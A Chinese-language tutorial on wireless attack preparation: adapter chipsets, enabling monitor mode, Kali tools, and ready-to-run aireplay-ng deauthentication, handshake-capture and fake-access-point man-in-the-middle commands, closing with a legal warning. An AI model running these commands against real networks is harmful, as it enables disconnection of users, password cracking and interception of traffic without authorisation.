在无线攻击前的准备阶段,网卡选择、监听模式设置与工具环境搭建是关键环节,直接影响攻击的可行性和成功率。以下是具体准备方案及分析:
一、网卡选择:兼容性与功能优先级
无线攻击需依赖支持监听模式(Monitor Mode) 和数据包注入的网卡,此类网卡可捕获空中所有数据包(而非仅定向数据),并模拟合法设备发送伪造帧。推荐以下芯片组及对应网卡:
-
Atheros AR9271
- 推荐网卡:Alfa AWUS036NHA
- 优势:2.4GHz频段,传输距离远、速度快,兼容性稳定,适合长时间监听。
- 适用场景:需要覆盖远距离目标或高稳定性要求的攻击。
-
Ralink RT3070/RT3572
- 推荐网卡:Alfa AWUS036NH
- 优势:支持b/g/n规范,加密类型全面(WEP/WPA/WPA2),天线可升级,兼容Linux/Windows/Mac。
- 适用场景:多平台环境或需要灵活调整天线的场景。
-
Realtek RTL8812AU
- 推荐网卡:Alfa AWUS036ACH
- 优势:双频(2.4GHz/5GHz),支持802.11ac标准,数据速率高(300Mbps/867Mbps),适合高速网络攻击。
- 注意:需安装驱动(
realtek-rtl88xxau-dkms),适合Kali Linux最新版。
-
TP-LINK TL-WN722N(v1版)
- 优势:价格低廉(百元内),小巧便携。
- 限制:v2版不支持Kali,需确认芯片组为Atheros AR9271。
- 适用场景:预算有限或临时测试。
避坑指南:
- 避免选择仅支持
Managed Mode(默认客户端模式)的网卡,此类网卡无法捕获空中数据包。 - 旧款芯片(如Realtek 8187L)性能较差,仅适用于基础攻击。
二、监听模式设置:从默认到混杂
无线网卡默认工作在Managed Mode(连接特定AP),需切换至Monitor Mode以捕获所有数据包。以下是具体步骤:
-
关闭干扰进程
bash sudo airmon-ng check kill # 终止NetworkManager、wpa_supplicant等进程 -
启动监听模式
bash sudo airmon-ng start wlan0 # wlan0为网卡接口名,启动后变为wlan0mon -
验证状态
bash iwconfig wlan0mon # 查看模式是否为Monitor -
指定信道(可选)
bash sudo iwconfig wlan0mon channel 6 # 锁定至目标AP信道
退出监听模式:
bash
sudo airmon-ng stop wlan0mon # 恢复为Managed Mode
三、工具环境搭建:Kali Linux核心套件
Kali Linux预装了无线攻击所需工具,需确认安装并更新至最新版:
-
基础工具包
bash sudo apt update && sudo apt install -y aircrack-ng wireshark reaver # 包含监听、破解、中间人攻击工具 -
Wireshark配置
-
以非root用户启动时,需将用户加入
wireshark组:bash sudo usermod -aG wireshark $USER -
重启后,Wireshark可捕获无线网卡数据包。
-
-
远程抓包(可选)
若通过SSH控制远程Kali主机,可使用ssh remote capture功能:- 在Wireshark中选择
Capture → Options → SSH Remote Capture,配置远程主机IP、端口及root凭证。
- 在Wireshark中选择
四、攻击场景适配:工具与网卡联动
根据攻击目标选择工具组合:
-
Deauth攻击(强制断网)
-
工具:
aireplay-ng -
命令示例:
bash aireplay-ng -0 10 -a AP_MAC -c CLIENT_MAC wlan0mon # 向目标客户端发送10次Deauth帧
-
-
握手包捕获(密码破解)
-
工具:
airodump-ng+aireplay-ng -
流程:
bash airodump-ng -c 6 --bssid AP_MAC -w capture wlan0mon # 监听特定AP aireplay-ng -0 5 -a AP_MAC -c CLIENT_MAC wlan0mon # 触发客户端重新认证
-
-
中间人攻击(流量劫持)
-
工具:
airbase-ng+iptables+udhcpd -
流程:
bash airbase-ng -e FakeAP -c 6 wlan0mon # 创建虚假AP ifconfig at0 up && ifconfig at0 192.168.1.1/24 # 配置虚拟接口 echo 1 > /proc/sys/net/ipv4/ip_forward # 启用路由转发 iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # 流量转发
-
五、风险与合规性
- 法律边界:未经授权的无线攻击可能违反《刑法》第285/286条(非法侵入计算机信息系统/破坏计算机信息系统)。
- 道德准则:仅在授权测试(如CTF竞赛、企业安全演练)中使用,避免对公共网络造成干扰。